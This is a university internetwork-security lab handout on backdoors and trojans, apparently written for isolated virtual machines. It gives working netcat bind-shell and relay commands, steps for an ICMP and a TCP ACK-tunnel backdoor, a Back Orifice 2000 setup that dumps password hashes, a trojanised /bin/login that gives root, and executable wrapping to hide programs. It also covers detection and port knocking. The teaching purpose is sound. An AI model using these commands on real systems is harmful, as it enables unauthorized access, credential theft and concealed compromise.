Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science

Lab 6 Trojans and Back Doors (MS Word)

advertisement 
ECE 4112 Internetwork Security
Lab 6: Backdoors and Trojans
Group Number: _________
Member Names: ___________________
_______________________
Date Assigned: October 4, 2005
Date Due: October 11, 2005
Last Edited: November 21, 2005
Please read the entire lab and any extra materials carefully before starting. Be sure to start early
enough so that you will have time to complete the lab. Answer ALL questions in the Answer
Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the
Date Due.
Goal: In this lab you will learn how backdoors can be used to gain access to a computer.
You will also see how Trojan programs can be used to create these backdoors.
Summary: This lab consists of four parts. In the first part, you will use Netcat to gain
access to a machine. In the second part of the lab, you will examine the properties of a Trojan by
using a software package called Virtual Network Computing (VNC). Next, you will be using a
Trojan program called Back Orifice 2000.
Background:
Read Counter Hack pp. 359-371, 399-422
Good reference website for relays:
http://www.ists.dartmouth.edu/IRIA/knowledge_base/linuxinfo/nc-intro.v0.80.htm
Tasks to be performed:
Create new XP virtual machine
Use Netcat to transfer files and create access to machines.
Edit iptables to open ports through the firewall in Linux host
Create a relay using Netcat.
Use VNC software on windows and Linux.
Use Back Orifice software to control a windows machine
Setup MS Outlook Express in Windows XP
Lab Scenario:
This lab will require you to have a second virtual machine running on your host system. If you
haven’t already made a copy, in one of the previous labs, follow the steps below to make one.
1
1
Creating a second Windows XP virtual machine
In VMware the virtual machine files are stored in directories in your root directory by default.
You just need to copy all the files from a machine's directory to a new one and then make a new
machine using these files.
In your Red Hat WS 4.0 physical machine's root/vmware directory make a new directory called
winXPProCopy
#cd /root/vmware
#mkdir winXPProCopy
Copy all the files from the winXPPro directory into this new directory.
#cp winXPPro/*.* winXPProCopy/
This will take some time as the image file is quite large.
Start VMware and click File->New->New virtual machine
Choose custom and click Next.
Select the operating system as Windows XP Professional.
Change the name of the new machine to winXPProCopy and change the directory to
/root/winXPProCopy. Click Next. Click Yes at the warning.
Adjust the virtual memory so that you can run all three machines at the same time. Bring it down
to 128mb for now.
Select Bridged networking and click Next.
Choose “Use an existing virtual disk” and click Next.
Click Browse and choose the file called winXPPro.vmdk in the new directory.
Click Finish.
This will create a new virtual machine on your host system.
You will need to change the ip address of the new WinXP virtual machine. Change it to the old
WinXP machine address + 1. For example, if it was w.x.y.z of the original XP machine, change
it to w.x.y.z+1. To do this:
Start the new virtual machine. If it gives you a warning about low memory just click ok as you
won't be using this machine for too long.
Click Start -> Control Panel
Network and Internet Connections
Network Connections
Right Click on local area connections
Properties
Select TCP/IP
Properties
Make your changes and click OK
Use VMware to stop the machine.
Note: This is only a temporary setup and you won't probably use the second XP machine after
this lab. We’ll call the original machine ‘XP Machine 1’ and the copy ‘XP Machine 2’.
Section 1. Installing and Using Netcat
2
2
Note: Netcat for Linux may be obtained from the web at
http://www.atstake.com/research/tools/network_utilities/
Installing Netcat on the Windows machine
Start your main Windows machine (XP 1) and copy the
\\57.35.10.10\secure_class\Tools\Windows directory to your computer. Unzip the nc11nt.zip
program and it should automatically create a directory called nc11nt. Now, whenever you want
to run Netcat, you will have to go into this folder and run it from there (unless you add this
directory to the path).
Now install Netcat on the other XP machine too (XP2).
Installing Netcat on the Linux machine
You should already have a file called netcat.tar.gz in your /home/tools directory. If you don’t,
get it from /mnt/nas4112/Tools/Linux/, after mounting the NAS server. Go into your /home/tools
directory and execute the following commands:
#tar xvfz netcat.tar.gz
#cd netcat
#make linux
#cp nc /usr/local/sbin
The last command will allow you to run Netcat without having to specify this directory.
Using Netcat
The executable program on both operating systems is called nc and the options are the same on
both systems. To run Netcat in client mode so that it sends data across a network, use
#nc [IP Address to send to] [Port to send to]
(e.g. nc a.b.c.d 1234 - This sends data to port 1234 on machine a.b.c.d)
All input is through standard in, so whatever you type on the keyboard will be sent to the other
machine. Alternatively, if you would like to read data from a file and pipe that through to the
other machine, use
#nc [IP address to send to] [Port to send to] < [File to read from]
(e.g. nc a.b.c.d 1224 < testfile.txt - This sends the data in testfile.txt)
To stop Netcat, one simply has to press Ctrl+C.
There are several different options that Netcat can be run with, depending on what it is being
used for. The most common options are:
-l
specifies that Netcat is running in listening mode
-p
specified which port Netcat should listen on
-v
verbose mode so that all results are displayed
-w
maximum amount of time (in clock ticks) to wait for a response
-z
specifies that Netcat should send very minimal data, usually a synchronized
packet to see if a response is obtained
-e
Allows Netcat to execute a program to receive or generate network traffic
Look at the README files on both systems under the Netcat folder to find out more information
about running Netcat. Many uses for netcat are found in the readme.
To run Netcat in listen mode, use the -l and -p options. The command syntax would be:
3
3
#nc -l -p [port to listen to]
If you want to store the input that is received, you can pipe all the received data to a file, using
the following command:
#nc -l -p [port to listen to] > [file to write to]
(e.g. nc -l -p 1224 > testfile.txt - whatever is received on port 1224 is written to
testfile.txt).
NOTE: If you pipe everything to a file, whatever was previously in that file will be overwritten.
Netcat can also be used to scan ports using the following command (Netcat is being used in
client mode for this):
#echo QUIT | nc -v -w [time to wait] -z [IP address to scan] [port range to scan]
(e.g. echo QUIT | nc -v -w 3 -z a.b.c.d 1-200 - This will scan ports 1 to 200 on the
system with IP address a.b.c.d)
Netcat can also be used to create backdoors on systems. Attackers can push a shell between
systems over any TCP or UDP port. The shell will have the privileges of the user that executes
Netcat in listener mode on the machine being exploited. For example, if you are on the Linux
machine and would like to execute commands on the Windows machine, set up the Netcat
listener on the Windows machine with the following command (from the nc11nt directory):
#nc -l –p [port to listen to] -e cmd.exe
(e.g. nc -l -p 7777 -e cmd.exe
This will pipe all input received at port 7777 to cmd.exe, which will then execute the
commands. )
On the client side, simply type
#nc [listening machine] [port to connect to]
(e.g. nc a.b.c.d 7777)
and start typing in your commands.
A fourth popular use of Netcat is to create relays whereby an attacker uses several intermediate
systems while actually attacking a target system. Thus, detection of where the attack originated
from is very painful and sometimes impossible process.
Exercise 1.1: Netcat File Transfer
Use Netcat to transfer the password file from your Linux to your Windows machine. Store the
data you receive in passwd.txt. Now try transferring a binary file (e.g. .rtf file) from the
Windows system to the Linux system and then transfer it back to the Windows system, saving it
under a different filename.
Q1.1.1. Is the binary filing the same, or has it been altered? Compare the file sizes of the file on
the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat’s ability to transfer binary files?
4
4
Exercise 1.2: Netcat Backdoors
This exercise will show you how to use backdoors in Netcat. Create a Netcat backdoor listener
on your Windows machine. Use the options to pipe the output to cmd.exe shell. Select any port
number to listen to and connect to this backdoor by running Netcat in client mode on your Linux
machine. Now type in some simple DOS commands like dir and mkdir. Then try running some
complex commands and examine the extent of information that you can gain from the system.
Q1.1.3. What do you conclude from this?
Exercise 1.3: Netcat Relays
Note: This exercise requires the use of both the windows machines.
In this exercise you will create a relay on your Linux machine using the Netcat listener and
client. This relay will forward data from one windows machine to the other. The Netcat client
will be running on the first XP machine while the listener will be running on the second XP
machine. Once established, the relay should allow you to access the second XP machine from the
original XP machine.
First create a backdoor shell on the new XP machine, using the Netcat listener. You can create a
backdoor shell by
# nc -l -p <listening port> -e cmd.exe
(e.g. nc -l -p 56789 -e cmd.exe)
Creating a relay
A way to create a relay is to tie the input and output of a Netcat listener and client together using
a special file type called a FIFO. As its name implies, a FIFO operates in First-In, First-Out
mode. You can create a FIFO and use it to link a Netcat listener to client by typing the following
in Linux:
# mknod backpipe p
# nc -l -p [portA] 0<backpipe | nc [target computer] [portB] 1>backpipe
portA – Port on which the relay is listening
portB – Port on the target machine on which the backdoor shell is listening
target computer – The target XP machine (XP Machine 2). Make sure its ip is different
from your other XP machine.
Note: Do not put spaces around the '<' or '>' signs. They direct the standard input and output
streams in Linux, into backpipe and cannot have spaces next to them.
e.g. nc -l -p 12345 0 <backpipe | nc e.f.g.h 56789 1 >backpipe
The line above creates a relay listening on TCP port 12345 and forwards the data to TCP port
56789 of the machine on which the backdoor shell was created.
5
5
For this relay to work, you have to allow packets into the listening port on your linux machine. If
the default Linux firewall iptables is running, it won’t allow these packets. So disable it by
typing
# /etc/init.d/iptables stop
After creating the relay and listener, connect to the relay by typing
#nc [relay machine] [portA]
on the original XP machine.
Now try some other commands on the target machine and see what all you can do.
Run the command called ipconfig in the shell. This will show you the ip address of the target
machine. Open up another cmd.exe window on your client machine and do ipconfig again to see
the ip address of the machine you’re connecting from. Position these windows so that both the ip
addresses are visible.
Take a screenshot of these windows and submit it with your report. You can use the “Print
Screen” key to capture the screen and then paste it into the paint application.
(Screenshot #1)
Hint: In this exercise, you used Netcat the following four times:
1. As a listener in the relay on your Linux machine
2. As a client in the relay on your Linux machine
3. As a listener, running the shell on the second XP machine
4. As a client on the first XP machine, where commands can be typed to be sent to the
relay.
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Exercise 1.4: Other uses of Netcat
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways.
Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like a netcat backdoor?
Section 2. Icmp-backdoor
In this exercise, we are going use another backdoor that exploits the ICMP protocol to get a
remote access shell. You should have two RedHat 7.2 virtual machines running to do this
exercise.
6
6
If you haven’t already, go ahead and connect to the NAS server and copy the file, icmpbackdoor.tar.gz (from mnt/nas4112/Tools/Linux) , to both of your virtual machines, and extract
the contents with the following command:
# tar zxvf icmp-backdoor.tar.gz
Go into the icmp-backdoor directory. In one virtual machine, we are going to compile the server
part of this program (which shall be referred to as the “Server machine”) with the command:
#make server
In the other virtual machine, we are going to compile the client part of this program (which shall
be referred to as the “Client machine”) with the command:
#make clien
You will need to follow the same copy and extract procedures you did with the other Linux
machine.
Next, we are going to start the server program on the Server machine (think of this as installing
the backdoor on an infiltrated machine). To do this, run this command:
#./ibd-server 0
The “0” refers to the ICMP code for “Echo reply” packets. We are setting this server to reply
back with its output in response to “Echo request” packets. This is important in order to make the
connection we want. Refer to Figure 1 to ensure you have run the proper commands up to this
point.
7
7
Figure 1. Installing and running the icmp-backdoor server.
Next, run ethereal on your RedHat 4WS machine. When we run commands off of this icmpbackdoor connection, we are going to see how data is transferred through the ICMP protocol.
In order to run the client and connect to the icmp-backdoor, run the following command on the
Client machine (where w.x.y.z is the IP address of the Server machine):
#./ibd-client w.x.y.z 8
The “8” refers to the ICMP code for “Echo request” packets. We are setting this client to send
echo request as input to the icmp-backdoor server. If we did this correctly, we will have a
connection established by exploiting the echo-request <-> echo-reply communication of the
ICMP protocol. Refer to Figure 2 to ensure you have run the proper commands up to this point.
Figure 2. Installing and running the icmp-backdoor client.
You should be connected by now… so let’s do stuff. For example, we ran the ls command, and it
shows the directory listing of the Server machine, as shown in Figure 3.
8
8
Figure 3. Running ls on the Server machine through the icmp-backdoor client.
While we’re at it, go ahead and run the whoami command just to see what privileges you have.
Okay, now let’s do something slightly more malicious. While we cannot use programs like vi
over this type of connection, we can still run simple commands to retrieve sensitive information.
Let’s see the password file! To do this, run the command “cat /etc/passwd” which should print
out on the client terminal the contents of the password file as shown in Figure 4.
9
9
Figure 4. Running cat /etc/passwd to print out the contents of the Server machine’s
password file.
So if we were a hacker, we could just copy the output from this screen to a text file and then run
a password cracker to decipher passwords. Go ahead and have fun running more commands to
see what else can be done over this icmp-backdoor. Once you’ve had your fun, close the
connection by running the exit command on the Client machine.
Now go back and stop your ethereal capture on your RedHat 4WS machine. You should able to
scroll down and see the ICMP packet exchanges that were made due to the commands you ran.
Highlight one of these packets by clicking on one of them, and move the bottom scollbar to see
the contents of the ICMP packet as shown in Figure 5.
10
10
Figure 5. Ethereal output showing an ICMP packet due to the backdoor connection.
You should notice that the content of what you saw in your backdoor client is visible in the
actual ICMP packets. Go ahead and take a screenshot of the ethereal output and turn it in with
your lab. Just for your information, there are some developer groups that are trying to enhance
this type of backdoor with encrypting the ICMP contents and hiding the backdoor server’s
process id. That is all for this exercise.
Take a screenshot of the ethereal output (screenshot #2)
Q2.1.1. What defenses could you use against an attack like icmp backdoor?
Section 3. Installing and Using Virtual Network
Connection (VNC)
You can obtain VNC from the web at http://www.realvnc.com/
VNC is an application level Trojan backdoor. It allows remote access to a system, and can be
11
11
used for legitimate remote system administration purposes. However, it can also be exploited by
hackers since VNC allows a person to change all configurations that they have permission to
change. Typically, the VNC server is installed on the system that is to be remotely administered
and the client is installed on the administrator’s system. Therefore, if the server was installed by
a user with administrator privileges and is running under that account, an attacker that uses the
VNC server would have full access to all functions of the system.
Installing and Using VNC on the Windows Machine
Copy the file vnc_x86_win32 folder from the NAS server’s tools/Windows folder to the tools
folder on your hard drive.
1 Change into the vnc_x86_win32/winvnc directory and double click the Setup program
2 Click OK on warning about installation of previous version.
3 Click Next
4 Click Yes on License Screen
5 Click Next for destination location default
6 Click Next for Program, Folder default
7 Click Finish
To run the Windows VNC server,
1. From the Start menu, select All Programs ->VNC -> Run WinVNC (App Mode)
2. Enter a password to be used for VNC connections. Remember this password as it will be
required for access to the VNC server by a client. This password prevents other attackers
from using the VNC server
3. Click OK. The server is now waiting on the Windows machine.
To run the Windows VNC client, simply click on “Run VNCviewer”. You will be prompted for
the IP address of the system on which the server is running and the password to access that
server. Once you have entered both, you should see a GUI come up with a terminal window.
Installing and Running VNC on the Linux Machine
Switch to the /home/tools directory, where you extracted all the linux tools, and run the
following command:
#tar xvfz vnc-3.3.3r2_x86_linux_2.0.tgz
Go into the VNC directory that is created. You will see that there are five different executable
programs. Go ahead and read the README file as this will provide you with explanations about
what each of the executables do.
For example, to run the VNC client, simply type
# ./vncviewer
When prompted for the machine of which the server is running, type in the Windows machine’s
IP address. At the next prompt, type in the password. And then you should see a GUI of the
Windows machine appear on the Linux system.
To run the VNC server, you will have to copy the VNC executables into the /usr/local/bin
directory. This puts them in the Linux path. To do this type
#cp vnc* /usr/local/bin
#cp Xvnc /usr/local/bin
12
12
Then simply type
#vncserver
Establish a password for the connection and remember this to connect to the Linux machine.
Make sure that after using VNC on the Linux system, you end each VNC process after
completion, otherwise the port that it listens on will be incremented when the next VNC process
is created.
NOTE: To make sure that you can connect to the VNC server running on the Linux system, you
have to modify the iptables to allow connections to TCP port 5901 since this is the port that the
VNC server runs on by default. Access to this port is normally blocked off (to check this out, run
nmap on the Linux system) by the built in firewall in Redhat. Instructions on how to edit the
iptables list are given below. Note that the change you make to the iptables is only temporary and
will be lost the next time you reboot the system.
Modifying IP tables:
To allow packets coming in destined for the VNC server, type:
# iptables --insert INPUT --protocol tcp --destination-port 5901 -j ACCEPT
If you still cannot connect from Windows then you might need to enter the exact port you just
opened in the firewall.
To do this, when you enter the host in VNC viewer, enter host:port
e.g. a.b.c.d:5901
On Windows, you will see another virtual desktop, not the normal user’s desktop and mouse
movements. Still, even though you cannot see what the normal user is doing, you have remote
control of the Linux system from Windows.
Exercise 3.1: Windows VNC Server
Set up a VNC server on your windows machine and connect to it from your Linux machine using
the Linux VNC viewer. Try running a couple of different programs, including the password
cracking software. Since you are logged on as an administrator, you should be able to do
anything.
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows
machine?
Exercise 3.2: Linux VNC Server
Start a VNC server on your Linux machine and try to control it from your Windows machine
using Windows VNC viewer. Run several different programs as well as view the password and
shadow files.
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Take a screenshot of the VNC client screen (Linux) and another of the VNC viewer
13
13
(Windows) accessing the VNC server. Turn these in with your report. (Screenshots #3, #4)
An easy way to take a screenshot in is to press the Print Screen key. A window will come up,
asking you for the name of the file. The format PNG is a standard picture format that can be
printed from your linux lab printer or a Windows computer.
Q3.1.3 What defenses could you use against an attack like VNC?
Section 4. BO2K BackDoor
Back-Orifice is one of the most well known Trojan/backdoor applications available. It is
important that you do not transfer this file off of these computers and to any ECE machines as
most modern virus scanners will mark this file as malicious.
The Bbo2k_1_0_full file can be copied from the NAS Server under the folder of
Tools\Windows. Copy the file to the desktop of one of your Windows XP virtual machines.
Double click on the program and then run through the installation process.
After installing, open the program “BO2k Configuration Tool”. Click next through the initial
startup screen. The next screen allows you to rename the server, you can just keep it named
“bo2k.exe” for this lab. The next screen determine whether to use TCP or UDP, just leave it as
TCP. Select a port number to run on the next screen (select something over 1024 e.g. 30000).
Click next through the next screen. Enter a passphrase on the next screen since we chose “XOR”
just choose something like “ece4112”. Now finish the configuration wizard.
Now the real configuration program opens. Click “Open server” and select the file name
“bo2k.exe”. Now click “Save Server”. And exit the program.
Now this bo2k.exe file needs to be transferred to the victim machine using the shared folders
available through VMWare tools. To do this:
1. Right-click on the WinXP virtual machine tab in VMWare and click Settings. Now click
on the Options tab. Click on Shared Folders and make sure that it is enabled. If it isn’t,
check the Enable Shared Folders checkbox. Now click Add… near the bottom of the
window and select the folder which you want to share (suggestion: you might want to
create and share a directory called root/vmware/shared). Enter a name for the shared
resources (“Shared Folder”).
2. Repeat the above for the XPPro Copy machine.
3. Now open My Computer in the XPPro machine and click Tools->Map Network Drive.
4. Use the default drive letter for “Drive:” and click Browse to locate the shared folder.
5. Expand VMWare Shared Folder and select the folder which you shared in step 1.
6. Repeat step 4 for the XP Copy machine.
Now, anything copied to the network drive will be available to both machines.
14
14
On the victims machine double click the bo2k.exe file you transferred. You have now installed
the backdoor on the victim machine. Go back to the Windows copy virtual machine.
On the non-server machine open the BO2k client program. Click file->new server and fill in the
IP address of your target machine and connect to it. Play around with some of the tools now
available to you. Have BO2k list the password hashes for the victim machine and take a screen
shot of this.
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the
password hashes of the victim machine.
Another such tool to control a remote XP machine is “Let Me Rule” (http://www.pinoyhaker.net/modules.php?name=Downloads&d_op-viewdownload&cid=1#cat). This program
packages a lot of the individual tools that we have played with, including a video stream, key
logger and an ftp server.
Section 5: Using a Simple Backdoor Program in C
Suppose you want to install a backdoor on a compromised linux machine. This nifty C program
(utrojan.c – see source code below) allows you to hijack login, imapd and/or qpopd. For this
exercise, we’ll overwrite login and access the victim machine via telnet.
The program can be obtained from:
http://packetstormsecurity.org/UNIX/penetration/rootkits/utrojan.c
This program overwrites the /bin/login command. While telneting to a victim machine, it
provides a “1 second time frame” in which you need to enter the password “door”. If you enter
this correctly, it executes /bin/sh, thereby giving you root access (from any user account installed
on the compromised machine). If you don’t enter in “door” correctly, within the time frame, the
program defaults to the original login script, saved as /bin/.login.
Make sure that telnet is running on the RH7.2 machine.
On the RH7.2 (victim machine):
1. Copy utrojan.c from the Lab6 folder on the NAS to /bin directory
2. Go to /bin directory and back up the login file
# mv login .login
3. Compile utrojan.c
# gcc –o login utrojan.c
On a WinXP machine:
1.Open the command line
2.Telnet into the RH72 machine: (you may need to start telnet by using ntsysv on the RH7.2
machine and rebooting)
C:\> telnet <ip address>
15
15
3.Within 1 second, type “door” and press enter
4.You should see the # prompt
5. Type whoami (you should be root)
Take a screenshot of this remote access. (#6)
On your RH7.2 machine move the backup .login file back to login to stop this backdoor.
Section 6: Backdoor Detection
In the preview sections, we looked at tools that install backdoors on systems. We asked you how
you would detect these backdoors. One probable answer is to look for suspicious ports that are
listening for connections. How can we do this? There are two windows tools, TCPView
(http://www.softpedia.com/public/cat/10/7/10-7-12.shtml) and Active Ports, that do exactly that.
Download the executable installer for TCPView from the NAS to one of your Windows XP
machines.
Extract the zip file. Click on Tcpview.exe. Take note of the processes running, the protocols they
use, the local and remote addresses, and the state.
Now run the Netcat listener by opening a command prompt and typing:
nc –l –p 7777 –e cmd.exe
Look back to TCPView. You should see a new process “nc.exe:xxxx”. The local address should
be xp:7777 and the state should be listening.
Take a screenshot (#7)
Now right click on the nc.exe process in TCPView and select “Process properties…” You should
see a pop up box with the path on the nc.exe program and also the command line arguments used
to execute the program.
Take a screenshot (#8)
To end a malicious process, right click on it and select “End Process….” You have just closed a
backdoor.
Section 7: Walkthrough Firewalls with Ack Tunneling
In an effort to maintain access to exploited boxes, hackers install backdoors. You have already
seen how a shell can be tunneled over ICMP messages. However, virtually all sysadmins have
blocked ICMP at their firewalls. Assuming you have access to the firewall rule set, you could
install a regular TCP server daemon and open a hole in the firewall. But such a hole can easily be
detected when a sysadmin scans his network. Fortunately, there is an alternative: ACK tunneling.
16
16
ACK tunneling does exactly what you would expect, it tunnels network traffic over TCP ACK
packets. The key advantages of this is that stateless firewalls allow any packet with the ACK flag
set as it assumes they are packets from a pre-existing connection. This allows us to send the
ACK packets right through the firewall and make a connection with the backdoor. Note that this
will not work on stateful firewalls as stateful firewalls keep the state of the active connections.
Fortunately, most firewalls are stateless. Stateless firewalls include the windows firewall, most
router/switch firewall boxes, and many high-traffic firewalls as statefulness is cpu-intensive.
Another advantage of ACK tunneling is that you can ACK scan with nmap through a firewall
and find all of the infected machines behind the firewall. So, for example, if you can get the
server installed on a bunch of targets in a company via an e-mail worm, then a simple nmap
ACK scan of the company from outside the firewall will show all the infected machines. This
has the advantage of not having a callback in the server which could reveal the attackers identity.
Lastly, most firewall logging systems only log SYNs, as a result our ACK traffic will not be
logged.
Ame Vidstorm has released a proof-of-concept ACK tunneling cmd.exe backdoor called
ackcmd. It consists of two parts, the server which listens on the target box, and the client which
the attacker uses. The client sends the port 80 to the server listening on 1054. These port
numbers look surprisingly like web traffic.
For this demo, you will need two XP machines.
Get the file ackcmp.zip from the NAS to both WinXP boxes.
On the victim machine:
Unzip ackcmd.zip and run AckCmdS.exe from the command line
# AckCmdS.exe
On the attacker’s machine:
Unzip ackcmd.zip.
Open ethereal on your RH WS4 machine and capture this process.
Back on the attacking machine: “AckCmdC.exe <victim IP>” from the command line
#AckCmdC.exe <victim IP>
#ipconfig
#quit
Take a screenshot (#9) from the attacking machine.
Examine the packets in ethereal.
You can kill ACkCmdS.exe on the victim’s box by <ctl>-<alt>-<del>, select processes, select
AckCmdS.exe and click End Process.
17
17
Section 8: Port Knocking
As you have seen, closing ports at the firewall is one of the best ways to secure a system.
Unfortunately, even if you close all unused ports, the services you are offering such as SSH,
HTTP, IMAP, etc. must have their ports open to allow connections. However, port knocking
allows for a server to close *ALL* ports (including those of services offered) while still allowing
connections to services. The basic principle is simple: when a user wants to connect to a closed
service, he sends packets to multiple closed ports in a secret order. If the port knock sequence is
correct, the server acts accordingly, such as by opening a port.
Despite the simplicity of the basic concept, there are several details which deserve discussion.
The most important detail is encryption; what happens if someone sniffs your knock sequence?
Under our simple description, they could merely replay the sequence and access the service.
Fortunately strong encryption can be integrated into the knock sequence to create a sequence that
is just as secure as SSL or SSH. The client and server can share a key, the key is then combined
with the source IP, port and other data. This data is encrypted and converted into a sequence of
protocol/port numbers to knock at. The server can decode and act on the request such as by
opening a specified port to/from the source IP explicitly. Even if an attacker replayed the
sequence, data such as the source IP and timestamp would fail to match, thus resulting in an
invalid knock sequence. It is also worth noting that there is no way to detect a host accepting
port knocks. The server drops all packets on the floor and doesn't even respond to a successful
knock. The only sign of success is the open port. Obviously port knocking cannot be used on a
public services. It would make no sense to require a port knock from everyone to access your
public web server. But port knocking does prove very useful for restricted-access hosts.
One related common misconception is that a box which drops packets appears to the world as
if it were off/disconnected. Unfortunately, this is not the case. The difference is how the nexthop router responds to the packet. For a box that is connected but dropping all packets, the
attacker will receive *NO* response. However attempting to connect to a host that is off/nonexistent will result in an ICMP Destination Unreachable from the last router before the target.
This is because a connected but dropping host still responds to the routers ARP packets, thus the
host is in the router's ARP table. Whereas a host that is off/non-existent will not have an entry in
the router's ARP table and will not respond to ARP requests, thus resulting in the ICMP packet.
Port knocking actually originated from a virus where the attacker included a simple port
knocking implementation to allow for backdoor access to infected machines. When it was first
announced as a mainstream security measure, port knocking was heavily criticized as securitythrough-obscurity. However, with the recent addition of encrypted knock sequences, port
knocking is becoming an acceptable additional layer of security. Unfortunately, there are few
implementations available and even fewer production quality releases.
Today we will use an port knocking implementation called fwknop (Firewall Knock Operator)
that was released in 2004 at DEFCON 12. According the fwknop website:
http://www.cipherdyne.org/fwknop/:
"fwknop implements network access controls (via iptables) based on a flexible port knocking
mini-language, but with a twist; it combines port knocking and passive operating system
fingerprinting to make it possible to do things like only allow, say, Linux-2.4/2.6 systems to
connect to your SSH daemon. fwknop supports shared, multi-protocol port knock sequences
18
18
along with both relative and absolute timeouts, and coded port knock sequences encrypted with
the Rijndael block cipher."
On your RH WS4 machine connect to the NAS and get the file “fwknop-0.4.2.tar.gz” from the
Lab6 directory. Move this file to your /root directory.
# cp ~
# tar xvfz fwknop-0.4.2.tar.gz
# cd fwknop-0.4.2
# ./install.pl
[+] Would you like access alerts sent to a different address ([y]/n)? n
[+] Enable fwknop at boot time ([y]/n)? y
Do the following steps to make sure the packets are logged:
# service syslog start
# iptables –F
# iptables –A INPUT –j LOG --log-tcp-options --log-ip-options --log-prefix “DROP:” –p tcp –m
state --state NEW
# iptables –A INPUT –j DROP –p tcp –m state --state NEW
# service iptables status
Lets modify fwknop to allow us to connect to any port using an encrypted knock:
Modify the following lines in /etc/fwknop/access.conf:
KEY: <choose a key at least 8 chars long>;
This will open a firewall port for the source IP address of anyone who knows the key. Note that
the desired firewall port to open is specified by the client.
There are two daemons required for fwknop to function correctly: fwknop and knopmd. knopmd
reads the iptables logfile and extracts port knocks into a named pipe. The named pipe is then
read by fwknop which interprets the port-knocks and adds/removes iptable rules accordingly. It
is critical that both daemons are always running, as a result there is a third daemon, knopwatchd
whose sole purpose is to ensure both knopmd and fwknop are running and to restart them if they
stop.
To start fwknop, we will run the monitoring daemon:
# knopwatchd
The server is now listening for port-knocks, lets try to connect.
For simplicity we will attempt to connect from the localhost, this is essentially identical to a
remote connection since all hosts, including loopback, should be blocked before we port-knock.
# fwknop -e -k localhost -s -p 22 -P tcp
-e: use encryption
19
19
-k: port-knock target
-s: allow source IP
-p: port to open
-P: protocol of port to open
After you enter your password, you should see the knock sequence. Notice that there is no sign
of success. All you can do now is attempt to SSH into localhost, which should work now.
# ssh localhost
You can also check the firewall ruleset to see if your special rule has been added:
# service iptables start
There are many interesting things you can do with fwknop. Explore the manpages and the
config files in /etc/fwknop to grasp the available features. One intriguing feature of fwknop is its
bundling of the passive OS fingerprinting tool p0f. This allows you to restrict port-knocks to
specific host OSes. The available OS fingerprints are in /etc/fwknop/pf.os.
1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8
subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want
to include port knocking in the backdoor.
3) No mention was made as to how port knocking servers finally close the open firewall
port. List 2 ways which could be employed to close the port.
Section 9: Tricking Users into Opening Backdoors
One way in opening backdoors is to have the very users of the machines open them for you. One
great way to do this is by sending the user a file that looks and feels safe. Programs known as
“wrappers” combine a series of files into one executable file. Once the wrapper file is opened, all
the wrapped files start to execute. The execution can be in series or in parallel, depending upon
the wrapper. We will use one of the best known wrapper utilities: eLiTeWrap v1.04
http://homepage.ntworld.com/chawmp/elitewrap
On a windows XP machine, go into the Lab6 directory on the NAS. Make sure that the
“elitewrap” folder is there. Copy this to your desktop and unzip it.
Note that there is nothing to install. Open up a command prompt and change directory to the
“elitewrap” folder. Elitewrap is command line driven. View the readme.txt file now and make
sure you have a clear understanding of the usage of elitewrap.
20
20
We will now create a totally harmless executable. We will create a wrapper that will execute
calc.exe and notepad.exe. We will make it so that all the user sees is the calculator when they
open the wrapper executable. We also want notepad.exe to open after the user has closed the
calculator, and we also want it to be invisible.
Before proceeding, be sure to close all instances of “notepad” and “calc”. Press Ctrl-Alt-Del and
verify that neither “notepad.exe” nor “calc.exe” appears under the processes tab.
In the command prompt, follow the steps:
1. Run the executable elitewrap.exe from the appropriate directory.
2. Enter name of output file as “NewCalculator.exe”
3. Perform CRC-32 checking? No
4. Enter package file #1: C:\Windows\system32\calc.exe
5. Enter operation: 4
6. Enter command line: <blank>
7. Enter package file #2: C:\Windows\system32\notepad.exe
8. Enter operation: 9
9. Enter command line: <blank>
10. Enter package file #3: <blank>
In the Windows GUI, go into the “elitewrap” folder and you should now see a new file named
NewCalculator.exe. Double click on NewCalculator.exe and the calculator program should open
up. Now check the processes tab. Notice how calc.exe is a running process (and still no instance
of notepad.exe).
Close the calculator program.
Q10.1.1 Does the notepad program appear after closing the calculator program?
Go back to the processes window.
Q10.1.2 Can you see notepad.exe in the processes window this time?
Q10.1.3 How do you detect a Trojan of this kind?
There are other programs like Silkrope (http://www.softpedia.com/public/cat/1/1-47.shtml)
which allows an attacker to create a Trojan. For example, if you have an installer for Quake
called quake.exe and an installer for a backdoor program like the ones we examined above,
silkrope allows you to combine these two installer programs into a single executable file. Thus,
when you launch the installer for Quake, the backdoor program gets installed in the background
without the user being aware of it. It might then send out a message over the network to attackers
signaling that the machine has been compromised.
Section 10: Web Knocking
21
21
Since traditional port knocking requires that the machine needs to be reachable at any of its
ports, firewall rules can easily be setup to protect machines such as Web Servers and Mail
Servers that render services at specific ports.
The concept of Web knocking involves sending HTTP requests to a web server. These may be
invalid requests or requests to pages which do not exist. These requests contain, embedded in
them, commands to be executed.
The primary difference between port knocking and web knocking is that if a firewall
exists, all port knocking attempts can be thwarted, however, web knocking attempts will
still be let through, since the firewall, by default will have to allow traffic on port 80 to
reach the web server.
User
Port knocking
attempts are
blocked by firewall
9250
5250
2234
1250
404
Web knocking
requests are allowed
to pass through
firewall.
80
80
Web Server
Firewall
(Only port 80 open)
Port knocking v/s Web knocking
For further details: (You may have to use Google Translate ® )
[http://semaphor.homeunix.org/semaphor.php?item=webknocking]
(Our version of web knocking is simpler, wherein the knocking code is just a single page.
The implementation can be extended to include a complex knocking sequence which
opens up a port or sets up a remote shell)
We have created a proof of concept web knocker script in Perl. This program performs the
following tasks:
22
22
a. Define the knocking code
(The value in $var, defines the knocking code used to activate the web knocker)
b. Extract all lines from the apache error_log which contain the knocking code
(This is done so that we can see whether someone has sent the knocking code)
(We search the error_log, since this is the place all 404 File not found errors are)
c. We see which commands have already been executed and ignore those
d. For each unexecuted command, we execute it.
(If we were to run this is stealth mode, the output would not appear on screen)
